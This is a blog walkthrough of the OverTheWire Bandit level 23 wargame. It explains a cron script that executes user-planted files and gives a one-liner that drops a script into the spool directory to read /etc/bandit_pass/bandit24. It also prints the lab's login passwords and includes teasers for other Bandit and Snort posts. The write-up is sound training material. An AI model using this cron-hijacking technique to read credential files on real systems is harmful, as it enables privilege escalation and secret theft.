Skip to main content

Bandit 23 Over The Wire

Lessons Learned

understanding more complicated bash scripts and writing bash scripts to take advantage of automated processes

Logging in

On a kali vm/ linux machine

Type:

ssh bandit23@bandit.labs.overthewire.org -p 2220
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n 

Completing The Challenge

The Goal:

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

The Solution:

bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

What it does:

myname = bandit24(whoami in a job set to run by bandit24)

cd /var/spool/bandit24

echo "Executing and deleting all scripts in /var/spool/bandit24"

for all files that can be called by " ."

    if not file is "." current folder and if not file is ".." previous folder

        then echo "Handling 'File'"

        owner = use the stat cmd to get information from the file "$i" and only return the user name of the         owner

        if the owner of the file is "bandit23"

             timeout send signal the number 9 which in the notes it says is kill, though to see other possible signals you can check "kill -l" as mentioned in the man page of timeout.

            the results of "kill -l" is 

bandit23@bandit:~$ kill -l
 1) SIGHUP       2) SIGINT       3) SIGQUIT      4) SIGILL       5) SIGTRAP
 6) SIGABRT      7) SIGBUS       8) SIGFPE       9) SIGKILL     10) SIGUSR1
11) SIGSEGV     12) SIGUSR2     13) SIGPIPE     14) SIGALRM     15) SIGTERM
16) SIGSTKFLT   17) SIGCHLD     18) SIGCONT     19) SIGSTOP     20) SIGTSTP
21) SIGTTIN     22) SIGTTOU     23) SIGURG      24) SIGXCPU     25) SIGXFSZ
26) SIGVTALRM   27) SIGPROF     28) SIGWINCH    29) SIGIO       30) SIGPWR
31) SIGSYS      34) SIGRTMIN    35) SIGRTMIN+1  36) SIGRTMIN+2  37) SIGRTMIN+3
38) SIGRTMIN+4  39) SIGRTMIN+5  40) SIGRTMIN+6  41) SIGRTMIN+7  42) SIGRTMIN+8
43) SIGRTMIN+9  44) SIGRTMIN+10 45) SIGRTMIN+11 46) SIGRTMIN+12 47) SIGRTMIN+13
48) SIGRTMIN+14 49) SIGRTMIN+15 50) SIGRTMAX-14 51) SIGRTMAX-13 52) SIGRTMAX-12
53) SIGRTMAX-11 54) SIGRTMAX-10 55) SIGRTMAX-9  56) SIGRTMAX-8  57) SIGRTMAX-7
58) SIGRTMAX-6  59) SIGRTMAX-5  60) SIGRTMAX-4  61) SIGRTMAX-3  62) SIGRTMAX-2
63) SIGRTMAX-1  64) SIGRTMAX

            to conclude the timeout line: if the file run here is owned by bandit23 then it will be run, but set to timeout after a minute. This might enable other users to have persistance, but over the wire asks us tonot keep uneeded processes  running and they set up a pretty simple cleanup for all scripts done in this challenge.

            granted its  also possible they have certain group/file permission set up to only allow bandit23 and bandit24 to write to the folder, im uncertain of ways to test this withou sudo or changing to a different user neither of which i will do now.

    finally the script concludes by forcing a delete of the file it just used.

 Here we can easily replicate the code from the last challenge. 

So create a file in /var/spool/bandit24 and populate it with something like the following

touch /var/spool/bandit24/yesboi; printf "#\!/bin/bash\nchmod 644\n/tmp/trhhvfhifuighvuyitg\ncat /etc/bandit_pass/bandit24 > /tmp/trhhvfhifuighvuyitg" > /var/spool/bandit24/yesboi; chmod +x /var/spool/bandit24/yesboi


As shown below

bandit23@bandit:~$ touch /var/spool/bandit24/yesboi; printf "#\!/bin/bash\nchmod 644\n/tmp/trhhvfhifuighvuyitg\ncat /etc/bandit_pass/bandit24 > /tmp/trhhvfhifuighvuyitg" > /var/spool/bandit24/yesboi; chmod +x /var/spool/bandit24/yesboi

bandit23@bandit:~$ cat /var/spool/bandit24/yesboi

#\!/bin/bash

chmod 644

/tmp/trhhvfhifuighvuyitg

cat /etc/bandit_pass/bandit24 > /tmp/trhhvfhifuighvuyitgbandit23@bandit:~$ cat /var/spool/bandit24/yesboi

cat: /var/spool/bandit24/yesboi: No such file or directory

bandit23@bandit:~$ cat /tmp/trhhvfhifuighvuyitg UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

I use a one liner to create the file, write to it and make it executable. The file uses printf for reliable new lines. And a backslash is added to ! Since that is a special character that result in a looking for event error. Which seems to be a bash feature that for history substitution. 

Labels:

Comments

Post a Comment

Popular posts from this blog

Snort Challenge - The Basics

Rules Ive Used # This file intentionally does not come with signatures.  Put your local # additions here. # alert icmp any any <> any any (msg: "IP ID 35369 Found"; id:35369; sid: 1000001; rev:1) # log tcp any any <> any any (msg: "ALL SYN FLAGS"; flags:S;  sid: 1000001; rev:1;) # log tcp any any <> any any (msg: "ALL SYN FLAGS"; flags:P,A;  sid: 1000001; rev:1;) # log ip any any <> any any (msg: "SAME-IP IN IP"; sameip; sid:1000001; rev:1;)#This was not used in the first snort, they only wanted the next 2 rules, which showed less dups log udp any any <> any any (msg: "SAME-IP IN TCP"; sameip; sid:1000001; rev:1;) log tcp any any <> any any (msg: "SAME-IP IN UDP"; sameip; sid:1000002; rev:1;)  Snort Params: Some Sniffer mode parameters are explained in the table below; Parameter Description -v Verbose. Display the TCP/IP output in the console. -d Display the packet data (payload). -e Display
Post a Comment
Read more

Bandit 20 Over The Wire

Lessons Learned using nc to create a steady connection, also on background and foreground processes Logging in On a kali vm/ linux machine Type: ssh bandit20@bandit.labs.overthewire.org -p 2220 GbKksEFF4yrVs6il55v6gwY5aVje5f0j Completing The Challenge The Goal: There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21). The Solution: bandit20@bandit:~$ nc -l -p 2000 ^Z [1]+  Stopped                 nc -l -p 2000 bandit20@bandit:~$ ./suconnect 2000 ^Z [2]+  Stopped                 ./suconnect 2000 bandit20@bandit:~$ fg 1 nc -l -p 2000 GbKksEFF4yrVs6il55v6gwY5aVje5f0j ^Z [1]+  Stopped                 nc -l -p 2000 bandit20@bandit:~$ fg 2 ./suconnect 2000 Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Post a Comment
Read more

Bandit 11 Over The Wire

 Lessons Learned using cyberchef for things like rot13 Logging in On a kali vm/ linux machine Type: ssh bandit11@bandit.labs.overthewire.org -p 2220  IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR Completing The Challenge The Goal: The password for the next level is stored in the file data.txt , where all lowercase (a-z) and uppercase (A-Z) letters have been rotated by 13 positions The Solution: bandit11@bandit:~$ cat data.txt Gur cnffjbeq vf 5Gr8L4qetPEsPk8htqjhRK8XSP6x2RHh   The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu This is known as rot13 and many free websites exist to solve this issue. CyberChef is a very good site/tool for this and can be downloaded
Post a Comment
Read more